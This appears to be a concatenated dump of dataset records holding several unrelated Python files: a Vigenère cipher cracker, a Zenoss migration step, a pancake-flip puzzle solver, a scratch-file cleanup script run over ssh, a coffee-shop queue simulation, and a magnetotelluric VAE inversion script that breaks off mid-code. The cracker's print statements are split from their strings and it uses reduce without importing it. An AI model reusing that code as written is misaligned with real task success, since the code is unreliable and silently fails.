passPercentage is the percentage of english words in the plaintext needed to consider the crack a success.\nI use a combination of Kasiki analysis to guess key lengths along with Turing's 'Bans' frequency analysis to find the most likely keys of a given length. I hope you enjoy!\nP.S. sorry for the lazy code.\n\nhttps://www.reddit.com/r/codes/comments/3apt0l/i_wrote_a_fully_automated_vigenere_cipher_cracker/\n\"\"\"\n\nfrom math import log\nimport re\nimport os\n\n\nclass VCipher:\n def __init__(self):\n self.Alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n self.Frequencies = {\n 'A': 84, 'B': 23, 'C': 21, 'D': 46, 'E': 116, 'F': 20, 'G': 25, 'H': 49, 'I': 76,\n 'J': 2, 'K': 5, 'L': 38, 'M': 34, 'N': 66, 'O': 66, 'P': 15, 'Q': 2, 'R': 64,\n 'S': 73, 'T': 81, 'U': 19, 'V': 11, 'W': 21, 'X': 2, 'Y': 24, 'Z': 3\n }\n\n for k in self.Frequencies.keys():\n self.Frequencies[k] = self.Frequencies[k] / 1000.0\n\n self.Bans = {}\n for a in self.Alphabet:\n x = (25 * self.Frequencies[a]) / (1 - self.Frequencies[a])\n x = log(x) / log(10)\n self.Bans[ord(a) - ord('A')] = x\n\n def TuringCheck(self, cipherText, keyLength, resultCount):\n ByLetter = {}\n for a in self.Alphabet:\n ByLetter[a] = []\n ordVal = ord(a) - ord('A')\n for col in range(0, keyLength):\n i = col\n Evidence = 0\n while i < len(cipherText):\n cipherVal = ord(cipherText[i]) - ord('A')\n diff = (cipherVal - ordVal) % 26\n Evidence += self.Bans[diff]\n i += keyLength\n ByLetter[a].append(Evidence)\n Result = []\n for i in range(0, keyLength):\n Column = {}\n for l in self.Alphabet:\n Column[l] = ByLetter[l][i]\n Result.append(Column)\n return self._GetLikelyPasswords(Result, resultCount)\n\n def Encrypt(self, plainText, key):\n CipherText = ''\n KeyPos = 0\n for l in plainText:\n if l in self.Alphabet:\n lV = ord(l) - ord('A')\n kV = ord(key[KeyPos].upper()) - ord('A')\n val = (lV + kV) % 26\n CipherText += chr(val + ord('A'))\n KeyPos = (KeyPos + 1) % len(key)\n elif l.upper() in self.Alphabet:\n lV = ord(l) - ord('a')\n kV = ord(key[KeyPos].lower()) - ord('a')\n val = (lV + kV) % 26\n CipherText += chr(val + ord('a'))\n KeyPos = (KeyPos + 1) % len(key)\n else:\n CipherText += l\n return CipherText\n\n def Decrypt(self, cipherText, key):\n PlainText = ''\n KeyPos = 0\n for l in cipherText:\n if l in self.Alphabet:\n lV = ord(l) - ord('A')\n kV = ord(key[KeyPos].upper()) - ord('A')\n val = (lV - kV) % 26\n PlainText += chr(val + ord('A'))\n KeyPos = (KeyPos + 1) % len(key)\n elif l.upper() in self.Alphabet:\n lV = ord(l) - ord('a')\n kV = ord(key[KeyPos].lower()) - ord('a')\n val = (lV - kV) % 26\n PlainText += chr(val + ord('a'))\n KeyPos = (KeyPos + 1) % len(key)\n else:\n PlainText += l\n return PlainText\n\n def _Factor(self, n):\n return set(reduce(list.__add__, ([i, n // i] for i in range(1, int(n ** 0.5) + 1) if n % i == 0)))\n\n def _FindRepeatedSubstrings(self, cipherText, subLength):\n Subs = {}\n for i in range(0, len(cipherText) - subLength):\n Substring = cipherText[i:i + subLength]\n if cipherText.count(Substring) > 1 and not Substring in Subs.keys():\n Subs[Substring] = [m.start() for m in re.finditer(Substring, cipherText)]\n\n return Subs\n\n def _AddToCountDict(self, d, v):\n if not v in d.keys():\n d[v] = 1\n else:\n d[v] += 1\n\n def Crack(self, cipherText, pathToEnglishDict, candidateCount, passPercentage):\n print\n \"Cracking...\\n{0}\".format(cipherText)\n with open(pathToEnglishDict) as f:\n Dictionary = [x.strip('\\n') for x in f.readlines()]\n Trimmed = self.Trim(cipherText)\n KeyLengthsDict = self.GetLikelyKeyLengths(Trimmed)\n KeyLengths = sorted(KeyLengthsDict, key=KeyLengthsDict.__getitem__, reverse=True)\n print\n \"Found {0} candidate key lengths\".format(len(KeyLengths))\n for length in KeyLengths:\n print\n \"Testing Length: {0}\".format(length)\n Keys = self.TuringCheck(Trimmed, length, candidateCount)\n for key in Keys:\n print\n \" Testing Key: {0}\".format(key)\n PlainText = self.TrimWithSpaces(self.Decrypt(cipherText, key))\n Words = PlainText.split()\n EnglishWordCount = 0\n for word in Words:\n if word in Dictionary: EnglishWordCount += 1\n Percentage = float(EnglishWordCount) / len(Words)\n print\n \" Percentage of english words in sample: %{0}\".format(Percentage * 100)\n if Percentage >= (passPercentage / 100.0):\n print\n \"-------------\"\n print\n \"Cracked!\"\n print\n \"Key = {0}\".format(key)\n print\n self.Decrypt(cipherText, key)\n return\n print\n \"No key found... try other cyphers\"\n\n def GetLikelyKeyLengths(self, cyphertext):\n Substrings = self._FindRepeatedSubstrings(cyphertext, 3)\n Diffs = []\n for substring in Substrings.keys():\n for i in range(0, len(Substrings[substring]) - 1):\n Diffs.append(Substrings[substring][i + 1] - Substrings[substring][i])\n FactorCounts = {}\n\n for d in Diffs:\n Factors = self._Factor(d)\n for f in Factors:\n self._AddToCountDict(FactorCounts, f)\n return FactorCounts\n\n def _GetLikelyPasswords(self, columns, count):\n ColumnLetters = []\n Counts = []\n for ranks in columns:\n ColumnLetters.append(sorted(ranks, key=ranks.__getitem__, reverse=True))\n Counts.append(0)\n\n Results = []\n ResultCount = 0\n while ResultCount < count:\n BestPass = \"\"\n SmallestDiff = 1000\n SmallestCol = -1\n for i in range(0, len(columns)):\n BestPass += ColumnLetters[i][Counts[i]]\n if Counts[i] < 25:\n V1 = columns[i][ColumnLetters[i][Counts[i]]]\n V2 = columns[i][ColumnLetters[i][Counts[i] + 1]]\n Diff = V1 - V2\n if Diff < SmallestDiff:\n SmallestDiff = Diff\n SmallestCol = i\n Counts[SmallestCol] += 1\n Results.append(BestPass)\n ResultCount += 1\n return Results\n\n def TrimWithSpaces(self, text):\n result = ''\n for l in text:\n if l.upper() in self.Alphabet or l == ' ':\n result += l.upper()\n return result\n\n def Trim(self, text):\n result = ''\n for l in text:\n if l.upper() in self.Alphabet:\n result += l.upper()\n return result\n\n","repo_name":"wittrup/crap","sub_path":"crack/vigenere_reddit.py","file_name":"vigenere_reddit.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17614592403","text":"import Migrate\n\nfrom Products.ZenModel.ZenossSecurity import *\n\nclass MoveHistoryToMoreMenu(Migrate.Step):\n version = Migrate.Version(2, 2, 0)\n \n def cutover(self, dmd):\n # Build menus\n dmd.buildMenus({\n 'More': [ { 'action': 'viewHistoryEvents',\n 'allowed_classes': ['EventClass', 'EventClassInst', \n 'Device', 'DeviceOrganizer', 'Location', 'System',\n 'DeviceClass'],\n 'banned_classes' : ['IpNetwork'],\n 'description': 'Event History',\n 'id': 'historyEvents',\n 'ordering': 1.0,\n 'permissions': (ZEN_VIEW,) } ]\n })\n viewHistory = dmd.zenMenus.More.zenMenuItems.viewHistory\n if not viewHistory.banned_classes:\n viewHistory.banned_classes = ('IpNetwork',)\n\n\nMoveHistoryToMoreMenu()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/MoveHistoryToMoreMenu.py","file_name":"MoveHistoryToMoreMenu.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"23545130491","text":"def flipper_simulator(pancake, k):\n counter = 0\n for i in range(len(pancake) - k + 1):\n if pancake[i] == \"-\":\n for j in range(k):\n if pancake[i + j] == '+':\n pancake[i + j] = '-'\n else:\n pancake[i + j] = '+'\n counter += 1\n for i in range(k):\n if pancake[len(pancake) - i - 1] == '-':\n return 'IMPOSSIBLE'\n return counter\n\nt = int(input())\nfor i in range(1, t + 1):\n pancakeList = []\n pancakes, k = input().split(\" \")\n for j in pancakes:\n pancakeList.append(j)\n k = int(k)\n print(\"Case #{}: {}\".format(i, flipper_simulator(pancakeList, k)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3002.py","file_name":"3002.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16797574714","text":"#!/usr/bin/python\n\nfrom optparse import OptionParser, SUPPRESS_HELP\nimport subprocess\nimport os\nimport sys\n\n\nbrokenHosts = [6, ]\nallowedHosts = [h for h in range(1, 20) if not h in brokenHosts]\n\n\nclass Error(Exception):\n\t\"\"\"is the base class of visible errors from this script.\"\"\"\n\tpass\n\n\nclass HostsError(Error):\n\t\"\"\"is raised when encountering unexpected nodes etc.\"\"\"\n\tpass\n\n\nclass ExecutionError(Error):\n\t\"\"\"is raised when trying to delete scratch files on non-knecht hosts.\"\"\"\n\tpass\n\ndef getUserScratchDirs():\n\tdirs = []\n\tdirs.append(os.path.join(\"/scratch\", os.getenv(\"USER\")))\n\tdirs.append(os.path.join(\"/lscratch\", os.getenv(\"USER\")))\n\tdirs.append(\"/scratch\")\n\tdirs.append(\"/lscratch\")\n\treturn dirs\n\n\ndef absPathOfThisScript():\n\treturn os.path.abspath(sys.argv[0])\n\n\ndef makeStringFromHostList(hostList):\n\tentities = []\n\tstartHost = hostList[0]\n\tfor ind, h in enumerate(hostList):\n\t\tif ind == 0:\n\t\t\tcontinue\n\t\tif not h == hostList[ind-1]+1:\n\t\t\tentities.append((startHost, hostList[ind-1]))\n\t\t\tstartHost = h\n\telse:\n\t\tentities.append((startHost, hostList[-1]))\n\thostStrings = []\n\tfor entity in entities:\n\t\tif entity[0] == entity[1]:\n\t\t\thostStrings.append(\"{:d}\".format(entity[0]))\n\t\telse:\n\t\t\thostStrings.append(\"{:d}-{:d}\".format(*entity))\n\treturn \",\".join(sorted(list(set(hostStrings))))\n\n\ndef parseHostsString(string):\n\thosts = []\n\ttokens = string.split(\",\")\n\tfor t in tokens:\n\t\tif \"-\" in t:\n\t\t\tfromTo = t.split(\"-\")\n\t\t\tif not len(fromTo) == 2:\n\t\t\t\traise HostsError(\"Bad format in hosts token '{:s}'.\\n\".format(\n\t\t\t\t\tt))\n\t\t\ttry:\n\t\t\t\thosts.extend(range(int(fromTo[0]), int(fromTo[1])+1))\n\t\t\texcept ValueError:\n\t\t\t\traise HostsError(\"Can't parse hosts token '{:s}'.\\n\".format(\n\t\t\t\t\tt))\n\t\telse:\n\t\t\ttry:\n\t\t\t\thosts.append(int(t))\n\t\t\texcept ValueError:\n\t\t\t\traise HostsError(\n\t\t\t\t\t\"Don't know what to do with hosts token '{:s}'.\\n\".format(t))\n\tfor h in hosts:\n\t\tif not h in allowedHosts:\n\t\t\traise HostsError(\"No such host: {:d}.\\n\".format(h))\n\thostnames = [\"Knecht{:0>2d}\".format(i) for i in sorted(list(set(hosts)))]\n\treturn hostnames\n\n\ndef parseCommandline():\n\tparser = OptionParser(usage=\"%prog [options] [ [ ...]]\"\n\t\t\"\\n\\nlogs in to specified hosts and deletes files or directories located\"\n\t\t\"\\nin the user scratch directories\"\n\t\t\"\\n{:s} and {:s}.\"\n\t\t\"\\nHostnames given as command line arguments supersede hosts specified\"\n\t\t\"\\nusing the --knechte option.\".format(\", \".join(getUserScratchDirs()[:-1]),\n\t\tgetUserScratchDirs()[-1]))\n\tparser.add_option(\"--dry-run\", help=\"Do not actually delete scratch files.\",\n\t\taction=\"store_true\", default=False, dest=\"dryRun\")\n\tparser.add_option(\"-f\", \"--force\", help=\"Don't ask before deleting\"\n\t\t\"\\nfiles/dirs. Don't use this option if you have running jobs or want to keep\"\n\t\t\"\\nparticular scratch files.\", dest=\"force\", action=\"store_true\",\n\t\tdefault=False)\n\tparser.add_option(\"-k\", \"--knechte\", help=\"Only delete files on specified\"\n\t\t\"\\nnodes. Pass a comma-separated list of numbers. Ranges using '-' are also\"\n\t\t\"\\nallowed. Example: KNECHT_LIST=1,3-5,7,9 will cause this script to delete\"\n\t\t\"\\nscratch files on knecht01, knecht03, knecht04, knecht05, knecht07 and\"\n\t\t\"\\nknecht09. The default is '{:s}'.\".format(makeStringFromHostList(allowedHosts)),\n\t\taction=\"store\", default=makeStringFromHostList(allowedHosts), type=\"str\",\n\t\tdest=\"hostsString\", metavar=\"KNECHT_LIST\")\n\t# hidden option for execution on nodes\n\tparser.add_option(\"--delete-scratch-files-here\", help=SUPPRESS_HELP,\n\t\tdefault=False, action=\"store_true\", dest=\"doDelete\")\n\topts, args = parser.parse_args()\n\tif len(args) > 0:\n\t\topts.hosts = sorted(list(set(args)))\n\telse:\n\t\topts.hosts = parseHostsString(opts.hostsString)\n\treturn opts\n\n\ndef getHostname():\n\ttry:\n\t\treturn open(\"/etc/hostname\").read().strip()\n\texcept IOError:\n\t\tp = subprocess.Popen([\"/usr/bin/hostname\",], stdout=subprocess.PIPE)\n\t\treturn p.communicate()[0]\n\n\ndef deleteFileOrDir(fileOrDir, opts):\n\tif os.path.isdir(fileOrDir):\n\t\ttokenType = \"directory\"\n\telif os.path.isfile(fileOrDir):\n\t\ttokenType = \"file\"\n\telse:\n\t\treturn\n\tif not opts.force:\n\t\tsys.stdout.write(\"\\t{:s}: Delete '{:s}'? (y/N) > \".format(\n\t\t\tgetHostname(), fileOrDir))\n\t\tsys.stdout.flush()\n\t\tret = raw_input(\"\")\n\t\tif not ret.strip().lower().startswith(\"y\"):\n\t\t\treturn\n\t# now delete file or dir \n\tcmd = [\"rm\", \"-rf\", fileOrDir]\n\tsys.stdout.write(\"\\tDeleting '{:s}'.\\n\".format(fileOrDir))\n\tsys.stdout.flush()\n\tif not opts.dryRun:\n\t\tp = subprocess.Popen(cmd)\n\t\tp.wait()\n\n\ndef isOwnedByMe(path):\n\treturn os.getuid() == os.stat(path).st_uid\n\n\ndef collectScratchFilesAndDirs():\n\tuserScratchDirs = getUserScratchDirs()\n\tfilesAndDirs = []\n\tfor s in userScratchDirs:\n\t\ttry:\n\t\t\tos.stat(s)\n\t\t\tif not os.path.isdir(s):\n\t\t\t\tcontinue\n\t\texcept OSError:\n\t\t\tcontinue\n\t\tfilesAndDirs.extend([os.path.join(s, i) for i in os.listdir(s)\n\t\t\tif isOwnedByMe(os.path.join(s, i)) and not os.path.join(s, i) in userScratchDirs])\n\treturn filesAndDirs\n\n\ndef deleteScratchFilesAndDirs(opts):\n\thostname = getHostname()\n\tif not \"knecht\" in hostname.lower():\n\t\traise ExecutionError(\"Expected to run on a knecht.\"\n\t\t\t\" Found to be executed on host '{:s}' instead.\\n\".format(\n\t\t\thostname))\n\tfor fileOrDir in collectScratchFilesAndDirs():\n\t\tdeleteFileOrDir(fileOrDir, opts)\n\n\ndef processHost(hostname, opts):\n\tsys.stdout.write(\"Processing host: {:s}\\n\".format(hostname))\n\tsys.stdout.flush()\n\tcmd = [\n\t\t\"/usr/bin/ssh\",\n\t\thostname,\n\t\tabsPathOfThisScript(),\n\t\t\"--delete-scratch-files-here\"\n\t]\n\tif opts.force:\n\t\tcmd.append(\"--force\")\n\tif opts.dryRun:\n\t\tcmd.append(\"--dry-run\")\n\tp = subprocess.Popen(cmd)\n\tp.wait()\n\n\ndef processHosts(opts):\n\tfor h in opts.hosts:\n\t\tprocessHost(h, opts)\n\n\ndef main():\n\topts = parseCommandline()\n\tif opts.doDelete:\n\t\tdeleteScratchFilesAndDirs(opts)\n\t\tsys.exit(0)\n\telse:\n\t\tprocessHosts(opts)\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n","repo_name":"mfherbst/dreuwBin","sub_path":"queuing_system/cleanup_scratch.py","file_name":"cleanup_scratch.py","file_ext":"py","file_size_in_byte":5798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1426487073","text":"# Importing libraries\r\nimport simpy\r\nimport random\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport dataframe_image as dfi\r\n\r\n# Initialising dictionary\r\nmenu = {1:[\"Black Coffee\", 4, 6],\r\n 2:[\"Latte\", 5, 8],\r\n 3:[\"Cappuccino\", 6, 8],\r\n 4:[\"Espresso\", 5, 7],\r\n 5:[\"Tea\", 3, 5]}\r\n\r\npayment_option = {1:[\"Card\", 2, 4],\r\n 2:[\"Cash\", 3, 5]}\r\n \r\n# Initialising variables\r\nnum_of_cashier = 2\r\nnum_of_barista = 3\r\n\r\n# Generate customers \r\n\r\n# Arrival rate of 20 customers/hour, based on a Poisson distribution\r\nnum_of_customers = int(np.random.poisson(20, 1)+1)\r\nnum_of_customers\r\n\r\ndef generate_cust(env, cashier, barista):\r\n for i in range(num_of_customers):\r\n yield env.timeout(random.randint(1, 60))\r\n env.process(customer(env, cashier, barista))\r\n \r\n \r\n# Define customer processes\r\ndef customer(env, cashier, barista):\r\n with cashier.request() as req:\r\n start_cq = env.now\r\n yield req\r\n payment_wait_time.append(env.now - start_cq)\r\n menu_item = random.randint(1, 5) # Choosing random menu\r\n payment_type = random.randint(1, 2) # Generate random payment type\r\n time_to_order = random.randint(payment_option[payment_type][1], payment_option[payment_type][2])\r\n yield env.timeout(time_to_order)\r\n payment_time.append(env.now - start_cq)\r\n \r\n with barista.request() as req:\r\n start_bq = env.now\r\n yield req\r\n order_wait_time.append(env.now - start_bq)\r\n time_to_collect = random.randint(menu[menu_item][1], menu[menu_item][2])\r\n yield env.timeout(time_to_collect)\r\n order_time.append(env.now - start_bq)\r\n \r\n# Run the model 100 times\r\nresults = []\r\n\r\nfor i in range(100):\r\n payment_wait_time = []\r\n payment_time = []\r\n order_wait_time = []\r\n order_time = []\r\n \r\n env = simpy.Environment()\r\n cashier = simpy.Resource(env, num_of_cashier)\r\n barista = simpy.Resource(env, num_of_barista)\r\n \r\n for i in range(8): # 8 hours\r\n env.process(generate_cust(env, cashier, barista))\r\n \r\n env.run(until=480)\r\n #print(len(payment_time))\r\n #print(payment_time)\r\n \r\n results.append([np.mean(payment_wait_time), np.mean(payment_time),\r\n np.mean(order_wait_time), np.mean(order_time)])\r\n\r\n# Create dataframe for the results\r\ndf = pd.DataFrame(results,columns=[\"payment_wait_time\", \"payment_time\", \"order_wait_time\", \"order_time\"])\r\n\r\ndf[\"total_time\"] = df.sum(axis=1)\r\n\r\nprint(df.head())\r\n\r\n# Descriptive statistics\r\nprint(df.describe())\r\n\r\n# Line graph\r\nplt.title(\"Coffee Shop Wait Time\")\r\n\r\nplt.plot(df.payment_wait_time)\r\nplt.plot(df.payment_time)\r\nplt.plot(df.order_wait_time)\r\nplt.plot(df.order_time)\r\nplt.plot(df.total_time)\r\nplt.legend([\"payment_wait_time\", \"payment_time\", \"order_wait_time\", \"order_time\", \"total_time\"],\r\n bbox_to_anchor = (1.05, 0.6))\r\n\r\nplt.show()\r\n\r\n\r\n# Histogram\r\n\r\nplt.title(\"Total Wait Time\")\r\n\r\nplt.hist(df.total_time)\r\nplt.show()","repo_name":"varaah/coffee-shop-simulation","sub_path":"simulation-coffee-shop.py","file_name":"simulation-coffee-shop.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19730202018","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 3 20:30:55 2021\r\n\r\n@author: RuiGuo\r\n\"\"\"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 17 14:14:17 2021\r\n\r\n@author: RuiGuo\r\n\"\"\"\r\n\r\n\r\nimport time\r\nimport os\r\nimport platform\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras import layers\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io as sio\r\nfrom numpy.linalg import norm\r\nfrom scipy.io import savemat, loadmat\r\nfrom scipy.ndimage import filters\r\n\r\n# from tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.layers import Input, Dense, Conv1D, Activation, MaxPool1D, Dropout\r\nfrom tensorflow.keras.layers import BatchNormalization, Flatten, Reshape, Conv1DTranspose, LeakyReLU\r\nfrom tensorflow.keras.models import Model\r\nfrom tensorflow.keras.optimizers import Adam, SGD\r\nfrom tensorflow.keras.datasets import mnist\r\nimport multiprocessing\r\nimport functools\r\nimport json\r\n# from pathos.multiprocessing import ProcessingPool\r\nimport random\r\nfrom tensorflow.keras import backend as K\r\n\r\nimport helpers_jointencoding as h_je\r\nimport math\r\nimport MT2DFWD2 as MT\r\nimport Jacobians as jacos\r\nfrom scipy.interpolate import RectBivariateSpline as rbs\r\n\r\nimport tensorflow as tf\r\ngpus = tf.config.experimental.list_physical_devices('GPU')\r\nif gpus:\r\n try:\r\n for gpu in gpus:\r\n tf.config.experimental.set_memory_growth(gpu, True)\r\n\r\n except RuntimeError as e:\r\n print(e)\r\n\r\nTRAIN = 0 ### TRAIN=0: Inversion ### TRAIN=1: TRAIN THENET ### TRAIN=2: test the net\r\nprint('TRAIN = {}'.format(TRAIN))\r\nSELECT_AS_INVERSIONMODE = 0 # 0 don't use multiprocerssing\r\nSEL_ACTIFUNC = 1 # what activation function is used. 1 means swish\r\nmax_iter = 13\r\nlamda = 0.07e-3 #\r\nlambda_decay = 0.95\r\nbeta = 6E-3\r\nbeta2 = 0 # Vertical regularization\r\nkl_weight = 10E-3 # 1e-2\r\nssim_w = 40E-2 # 1e-2\r\nVAE_NO = 81\r\nVAE_NO2 = 81\r\nlatent_dim = 16\r\nlatent_dim2 = 16\r\ntrmono = 0\r\nPINGHUA = 1\r\nN1 = 1 # For training use 30000, for test use 8000\r\nTB = 1 # Two block, another block plus what\r\nbar_1 = np.log10(1)\r\nbar_2 = np.log10(320)\r\ninitial_res = np.log10(200)\r\nCost_threshold = 0.005 # for one block, 1E-3better! # Change convergence logic\r\nDelta_cost_threshold = 0.0005\r\nUse_ref = 1\r\nAdd_noise = 1\r\n# dir_name = 'training_rho_middle_dataset_vae_'+str(VAE_NO) # Network direction\r\ndir_name = '../myHTEM_20220707_for_1D_VAE/HTEM_network' + '/Net_' + str(VAE_NO)\r\ndir_name2 = '../myHTEM_20220707_for_1D_VAE/HTEM_network' + '/Net_' + str(VAE_NO2)\r\nfre1 = 0.5\r\nfre2 = 4\r\nfreqNumberMT = 14\r\nUID = 'model20220811b_vae_{:d}&{:d}_lmbd_{:2f}_dcy_{:2f}_beta_{:2f}_ur_{}_AN_{}_noi0.5perc_fre{}-{}_{}_beta2_{}'.\\\r\n format(VAE_NO,VAE_NO2, lamda, lambda_decay,beta,Use_ref,Add_noise,fre1,fre2,freqNumberMT,beta2)\r\n# if TRAIN == 1:\r\n# from tensorflow.python.framework.ops import disable_eager_execution\r\n# disable_eager_execution()\r\nif latent_dim == 128:\r\n plot_x = 8\r\n plot_y = 16\r\nif latent_dim == 64:\r\n plot_x=8\r\n plot_y=8\r\nif latent_dim == 16:\r\n plot_x=4\r\n plot_y=4\r\nif latent_dim == 36:\r\n plot_x=6\r\n plot_y=6\r\nsys = platform.system()\r\nif sys == \"Windows\":\r\n print(\"OS is Windows.\")\r\nelif sys == \"Linux\":\r\n # plt.switch_backend('Agg')\r\n print(\"OS is Linux.\")\r\n if TRAIN == 1 or TRAIN == 0:\r\n gpus = tf.config.list_physical_devices(device_type='GPU')\r\n tf.config.set_visible_devices(devices=gpus[0], device_type='GPU')\r\n tf.config.experimental.set_memory_growth(device=gpus[0], enable=True)\r\n # else:\r\n # cpu = tf.config.list_physical_devices(device_type='CPU')\r\n # tf.config.set_visible_devices(devices=cpu[0], device_type='CPU')\r\n # tf.config.experimental.set_memory_growth(device=cpu[0], enable=False)\r\n\r\nclass Sampling(tf.keras.layers.Layer):\r\n \"\"\"Uses (z_mean, z_log_var) to sample z, the vector encoding a digit.\"\"\"\r\n def call(self, inputs):\r\n z_mean, z_log_var = inputs\r\n batch = tf.shape(z_mean)[0]\r\n dim = tf.shape(z_mean)[1]\r\n epsilon = tf.keras.backend.random_normal(shape=(batch, dim))\r\n return z_mean + tf.exp(0.5 * z_log_var) * epsilon\r\n \r\n# %% Simulation Setup\r\n\r\nfieldXStart = 0\r\nfieldXEnd = 10000\r\nXNumberMT = 100\r\nxEdgeLocationMT = np.linspace(fieldXStart, fieldXEnd, XNumberMT + 1)\r\nxElementLocationMT = 0.5 * (xEdgeLocationMT[0:-1] + xEdgeLocationMT[1:])\r\nZNumberMT = 80\r\ndh = np.zeros(ZNumberMT)\r\nfor i in range(ZNumberMT):\r\n # dh[i] = 5 * math.pow(1.051,i) # 5 km\r\n dh[i] = 2.5 * math.pow(1.047, i) # 2 km\r\nzEdgeLocationMT = np.concatenate(([0],np.cumsum(dh)))\r\nzElementLocationMT = 0.5 * (zEdgeLocationMT[0:-1] + zEdgeLocationMT[1:])\r\n[xMT, yMT] = np.meshgrid(xElementLocationMT, -zElementLocationMT)\r\n[xElementLengthMT, zElementLengthMT] = np.meshgrid(np.diff(xEdgeLocationMT), np.diff(zEdgeLocationMT))\r\nelementSizeMT = xElementLengthMT * zElementLengthMT\r\ngridNumberMT = ZNumberMT * XNumberMT\r\ntimestamp2 = time.time()\r\ndomainDepth = zEdgeLocationMT[-1]\r\n\r\nXNumberMT1 = 50\r\nxEdgeLocationMT1 = np.linspace(fieldXStart, fieldXEnd, XNumberMT1 + 1)\r\ninterpXLocations = 0.5 * (xEdgeLocationMT1[0:-1] + xEdgeLocationMT1[1:])\r\nZNumberMT1 = 64\r\ndh1 = np.zeros(ZNumberMT1)\r\nfor i in range(ZNumberMT1):\r\n # dh1[i] = 12 * math.pow(1.050,i) # 5 km\r\n # dh1[i] = 12 * math.pow(1.009, i) # 1 km\r\n dh1[i] = 5 * math.pow(1.032, i) # 1 km\r\nzEdgeLocationMT1 = np.concatenate(([0],np.cumsum(dh1)))\r\ninterpDepths = 0.5 * (zEdgeLocationMT1[0:-1] + zEdgeLocationMT1[1:])\r\n[interX, interZ] = np.meshgrid(interpXLocations, -interpDepths)\r\n\r\n# val_rate=1\r\n#\r\n# name=\"/home/hy-zhou/matlab/rho_vel2sD_8000.mat\"\r\n# name = \"/home/hy-zhou/matlab/rho_vel/rho_vel0s/rho_vel0s_7400.mat\"\r\n# name = \"/home/hy-zhou/joint_encoding/simple_set_dataset/simple_set1.mat\"\r\n# name = \"/home/hy-zhou/joint_encoding/middle_dataset/middle_set1.mat\"\r\n# name = \"/home/hy-zhou/joint_encoding/middle_dataset/middle_set_outlier2.mat\"\r\n# '''是否对训练集平滑'''\r\n# w1 = h_je.fspecial_gaussian(np.array([4, 4]), 4)\r\n#\r\n# rhovels = loadmat(name)\r\n# rhoTruth = rhovels['logFieldRhoInv']\r\n# rhoTruth1 = np.zeros((64, 128, N1))\r\n# for ii in range(N1):\r\n# VLayeredMatTemp = h_je.interp2_nearest(xMT,yMT,np.reshape(rhoTruth[ii,:],(ZNumberMT, XNumberMT), order='f'), interX, interZ)\r\n# if PINGHUA:\r\n# rhoTruth1[:,:,ii] = filters.convolve(VLayeredMatTemp, w1)\r\n#\r\n# rhoTruth1 = rhoTruth1.transpose((2,0,1))\r\n# rhoTruth1 = np.expand_dims(rhoTruth1, axis=3)\r\n#\r\n# indices = list(range(N1))\r\n# # random.shuffle(indices)\r\n# train_ind = indices[:int(N1*(1-val_rate))]\r\n# val_ind = indices[int(N1*(1-val_rate)):]\r\n# #\r\n# # train_ind = np.load('train_ind.npy').tolist()\r\n# # val_ind = np.load('val_ind.npy').tolist()\r\n# rho_train = rhoTruth1[train_ind,:, :,:]\r\n# rho_test = rhoTruth1[val_ind, :, :, :]\r\n# # np.save('train_ind.npy', np.array(train_ind, dtype='uint16'))\r\n# # np.save('val_ind.npy', np.array(val_ind, dtype='uint16'))\r\n#\r\n# del rhoTruth\r\n# del rhoTruth1\r\n\r\n# %% Network1\r\nH = 64\r\nC = 1\r\n## Latent space\r\n\r\ninputs = Input(shape=(H,C), name=\"inputs\") # 64 1\r\nif True:\r\n x = inputs\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 32 16\r\n\r\n x = Conv1D(16, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 32 16\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 16 32\r\n\r\n x = Conv1D(32, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 16 32\r\n\r\n x = Conv1D(64, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n # x = MaxPool1D(2)(x) # 8 64\r\n\r\n x = Conv1D(64, 3, padding=\"same\")(x)\r\n x = BatchNormalization()(x)\r\n x = keras.activations.swish(x)\r\n x = MaxPool1D(2)(x) # 8 64\r\n\r\n x = Flatten()(x)\r\n units = x.shape[1]\r\n z_mean = Dense(latent_dim, name=\"z_mean\")(x)\r\n z_log_var = Dense(latent_dim, name=\"z_log_var\")(x)\r\n\r\n meanModel = Model(inputs,z_mean) # 64 - 8\r\n # encoder_output = Sampling()((z_mean, z_log_var))\r\n encoder_output = Sampling()((meanModel(inputs), z_log_var))\r\n\r\n encoder = Model(inputs,encoder_output)\r\n # encoder.compile(optimizer=Adam(1e-3), loss='mse')\r\n encoder.summary()\r\n\r\n decoder_inputs = Input(shape = (latent_dim), name=\"decoder_inputs\")\r\n x = Dense(units)(decoder_inputs)\r\n x = keras.activations.swish(x)\r\n x = Reshape((8, 64))(x)\r\n\r\n x = 